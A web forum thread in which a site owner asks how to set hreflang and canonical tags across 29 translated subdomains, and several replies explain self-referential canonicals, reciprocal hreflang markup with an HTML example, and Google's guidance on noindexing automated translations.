Hreflang/Canonical Inquiry for a Website with 29 Different Languages
-
Hello,
So I have a website (www.example.com) with 29 subdomains (es.example.com, vi.example.com, it.example.com, etc.).
Each subdomain has the exact same content for each page, fully translated into its respective language.
I currently do not have any hreflang/canonical tags set up.
I was recently told that the following is the correct way to set these tags up:
-For each subdomain (es.example.com/blah-blah in this example), I need to place an hreflang tag pointing to the page itself (es.example.com/blah-blah), plus hreflang tags for each of the other 28 subdomains that have that page (it.example.com/blah-blah, etc.). In addition, I need to place a canonical tag pointing to the main www. version of the site. So I would have 29 hreflang tags plus a canonical tag.
When I brought this to a friend's attention, he said that pointing the canonical tag at the main www. version would cause the subdomains to drop out of the SERPs in their respective countries' search engines, which I obviously wouldn't want.
I've tried to read articles about this, but I always end up hitting a wall and confusing myself further. Can anyone help? Thanks!
-
_For each subdomain (es.example.com/blah-blah in this example), I need to place an hreflang tag pointing to the page itself (es.example.com/blah-blah), plus hreflang tags for each of the other 28 subdomains that have that page (it.example.com/blah-blah, etc.). In addition, I need to place a canonical tag pointing to the main www. version of the site. So I would have 29 hreflang tags plus a canonical tag._
Everything is correct except the canonical part (though maybe I misunderstood what you wrote).
If the country-targeted pages are in different languages, then you should NOT point the rel="canonical" to the main www. version, because the pages are not identical. If you did, you would start seeing the search snippets of those geo-targeted URLs (shown because of the hreflang) use the title tag and meta description of the www. version page. For instance, the search snippet for the Italian version would show the Italian URL but everything else in English. If you need to use rel="canonical", it should be self-referential (or, in some cases, point to another page, but one on the same subdomain).
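To make that concrete, here is a sketch of what the head of the Spanish page could contain. The subdomains and URLs are the example ones from the question; in practice you would list all 29 language versions, each with its correct language code:

```html
<!-- On https://es.example.com/blah-blah -->
<!-- Self-referential canonical: points to this page, not the www. version -->
<link rel="canonical" href="https://es.example.com/blah-blah" />
<!-- One hreflang entry for this page plus every translated equivalent -->
<link rel="alternate" hreflang="es" href="https://es.example.com/blah-blah" />
<link rel="alternate" hreflang="vi" href="https://vi.example.com/blah-blah" />
<link rel="alternate" hreflang="it" href="https://it.example.com/blah-blah" />
<!-- ...one line per remaining subdomain... -->
<!-- Optional: x-default for users whose language matches none of the versions -->
<link rel="alternate" hreflang="x-default" href="https://www.example.com/blah-blah" />
```

Note that every version must carry the complete set of hreflang tags, including one pointing to itself, and the annotations must be reciprocal across all subdomains, or search engines may ignore them.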
-
Hi,
Probably the easiest solution in your case is to use the geo-targeting settings in Google Webmaster Tools (but only if each of your subdomains targets a specific country, not just a specific language).
If you want to use hreflang, there is quite a good post on it on Moz (http://moz.com/blog/hreflang-behaviour-insights), though I must admit I've personally never used it.
rgds,
Dirk
-
If your translations are automated, Google requests that you not index them, but it sounds like you've created fully translated, static pages. Here's Google's info on that: "Q: Can I use automated translations?
A: Yes, but they must be blocked from indexing with the “noindex” robots meta tag. We consider automated translations to be auto-generated content, so allowing them to be indexed would be a violation of our Webmaster Guidelines." Maybe this is where someone got confused. Anyway, here's their larger FAQ on it: https://sites.google.com/site/webmasterhelpforum/en/faq-internationalisation. Fully translated pages are considered canonical within their own languages, so there's no need to point to the www. version as canonical.
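For reference, the tag Google is describing there looks like this. It belongs only on machine-translated pages you want kept out of the index; fully human-translated pages like yours should not carry it:

```html
<!-- Place in the <head> of auto-translated pages only -->
<meta name="robots" content="noindex" />
```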